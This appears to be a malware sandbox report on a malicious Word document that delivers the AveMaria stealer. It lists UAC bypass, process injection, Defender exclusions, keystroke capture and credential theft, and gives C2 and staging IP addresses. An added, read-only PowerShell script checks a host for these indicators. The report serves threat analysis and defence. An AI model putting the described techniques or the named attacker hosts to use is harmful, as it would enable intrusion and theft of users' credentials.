Windows Analysis Report
Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc

Overview

General Information

Sample Name: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
Analysis ID: 708250
MD5: 9bc102ffb0930f5dee65bde8e0ba6d89
SHA1: 37cac7507a6ad02a75d947a9bdfe115f2da8b71b
SHA256: 959837140aee207e9fd845a030881f9430364d2df8088845f5828579420b1717
Tags: doc

Detection

AveMaria, UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Yara detected AntiVM3
Document exploit detected (creates forbidden files)
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Document contains OLE streams with names of living off the land binaries
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Powershell drops PE file
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Writes to foreign memory regions
Increases the number of concurrent connections per server for Internet Explorer
Bypasses PowerShell execution policy
Contains functionality to hide user accounts
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found suspicious RTF objects
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Potential document exploit detected (performs HTTP gets)
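The signatures above describe the artefacts this chain leaves on a host: a Windows Defender directory exclusion, a scheduled task whose action points into a temp/AppData path, dropped PE files with benign system names whose Zone.Identifier stream has been stripped, injection into explorer.exe and MSBuild.exe, and an AveMaria C2 on a non-standard port. The script below is an added host-triage check, not part of the Joe Sandbox report, that looks for exactly those artefacts on a suspect Windows machine. The dropped-file paths (C:\Users\<user>\AppData\Roaming\eDdYRRbouy.exe and explorer.exe), the C2 endpoint 20.126.95.155:7800 and the staging host 159.223.2.212 are taken from this report; the function names, the path heuristics and the output shape are this example's own assumptions.

```powershell
# Added triage script for the behaviours listed in report 708250 (not Joe Sandbox code).
# Run in an elevated PowerShell on the suspect host; read-only, nothing is deleted.
#Requires -RunAsAdministrator

$Indicators = @{
    DroppedFiles = @(
        "$env:APPDATA\eDdYRRbouy.exe",
        "$env:APPDATA\explorer.exe"        # PE dropped with a benign system name
    )
    C2Address   = '20.126.95.155'          # AveMaria config extracted by the sandbox
    C2Port      = 7800
    StagingHost = '159.223.2.212'          # port-80 peer seen during the analysis run
}

function Get-DefenderExclusionFindings {
    # "Adds a directory exclusion to Windows Defender": any exclusion under the user
    # profile, AppData or Temp is suspicious on a workstation (heuristic, assumed).
    $pref = Get-MpPreference
    foreach ($path in @($pref.ExclusionPath)) {
        if ($path -like "$env:USERPROFILE*" -or $path -like '*\AppData\*' -or $path -like '*\Temp\*') {
            [pscustomobject]@{ Check = 'DefenderExclusion'; Detail = $path }
        }
    }
}

function Get-ScheduledTaskFindings {
    # "Scheduled temp file as task from temp location": flag every task action whose
    # executable or arguments resolve into Temp or AppData.
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in @($task.Actions)) {
            $cmd = "$($action.Execute) $($action.Arguments)"
            if ($cmd -match '\\AppData\\|\\Temp\\|%TEMP%|%APPDATA%') {
                [pscustomobject]@{ Check = 'ScheduledTask'; Detail = "$($task.TaskName): $cmd" }
            }
        }
    }
}

function Get-DroppedFileFindings {
    # "Hides that the sample has been downloaded from the Internet (zone.identifier)":
    # a PE fetched over HTTP normally carries a Zone.Identifier ADS, so a freshly
    # dropped executable in %APPDATA% without one is itself an indicator.
    foreach ($file in $Indicators.DroppedFiles) {
        if (-not (Test-Path -LiteralPath $file)) { continue }
        $zone = Get-Item -LiteralPath $file -Stream Zone.Identifier -ErrorAction SilentlyContinue
        $hash = (Get-FileHash -LiteralPath $file -Algorithm SHA256).Hash
        $state = if ($zone) { 'present' } else { 'MISSING' }
        [pscustomobject]@{ Check = 'DroppedFile'; Detail = "$file sha256=$hash zone.identifier=$state" }
    }
}

function Get-NetworkFindings {
    # Live connections to the extracted C2 (non-standard port 7800) or to the staging host,
    # with the owning process so the injected host (explorer.exe / MSBuild.exe) is visible.
    Get-NetTCPConnection -ErrorAction SilentlyContinue |
        Where-Object {
            ($_.RemoteAddress -eq $Indicators.C2Address -and $_.RemotePort -eq $Indicators.C2Port) -or
            $_.RemoteAddress -eq $Indicators.StagingHost
        } |
        ForEach-Object {
            $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Check  = 'C2Connection'
                Detail = "$($_.RemoteAddress):$($_.RemotePort) pid=$($_.OwningProcess) ($($proc.ProcessName))"
            }
        }
}

function Get-InjectionHostFindings {
    # explorer.exe and MSBuild.exe were the injection targets in the sandbox run: an
    # explorer.exe running from the user profile, or any MSBuild.exe on a host that does
    # not build software, deserves a look at its parent process.
    Get-CimInstance Win32_Process -Filter "Name='explorer.exe' OR Name='MSBuild.exe'" |
        Where-Object { $_.ExecutablePath -like '*\AppData\*' -or $_.Name -eq 'MSBuild.exe' } |
        ForEach-Object {
            [pscustomobject]@{
                Check  = 'SuspiciousProcess'
                Detail = "$($_.Name) pid=$($_.ProcessId) path=$($_.ExecutablePath) parent=$($_.ParentProcessId)"
            }
        }
}

$findings = @(Get-DefenderExclusionFindings) + @(Get-ScheduledTaskFindings) +
            @(Get-DroppedFileFindings) + @(Get-NetworkFindings) + @(Get-InjectionHostFindings)

if ($findings.Count -eq 0) { 'No indicators from report 708250 found on this host.' }
else { $findings | Format-Table -AutoSize -Wrap }
```

A clean host prints the "No indicators" line; any finding row is a reason to pull the full process tree (WINWORD.EXE spawning powershell.exe, then MSBuild.exe and explorer.exe) and the scheduled-task XML before remediating. The path heuristics will also flag legitimate developer tooling (MSBuild.exe under Visual Studio, build agents that exclude their work directory), so treat the output as a starting point for investigation rather than a verdict.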

Classification

AV Detection

Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc ReversingLabs: Detection: 32%
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc Virustotal: Detection: 50%
Source: Yara match File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Roaming\eDdYRRbouy.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\explorer.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe Joe Sandbox ML: detected
Source: 8.2.explorer.exe.3a2b638.11.unpack Avira: Label: TR/AD.MortyStealer.utbzg
Source: 17.0.MSBuild.exe.400000.0.unpack Avira: Label: TR/Redcap.ghjpt
Source: 00000011.00000003.963762920.00000000006D8000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: AveMaria {"C2 url": "20.126.95.155", "port": 7800}

Exploits

Source: Yara match File source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 2360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 2040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 676, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1248, type: MEMORYSTR
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory created: C:\Program Files\Microsoft DN1
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdbXr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB[xp source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdbDr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbUy source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: explorer[1].exe.0.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
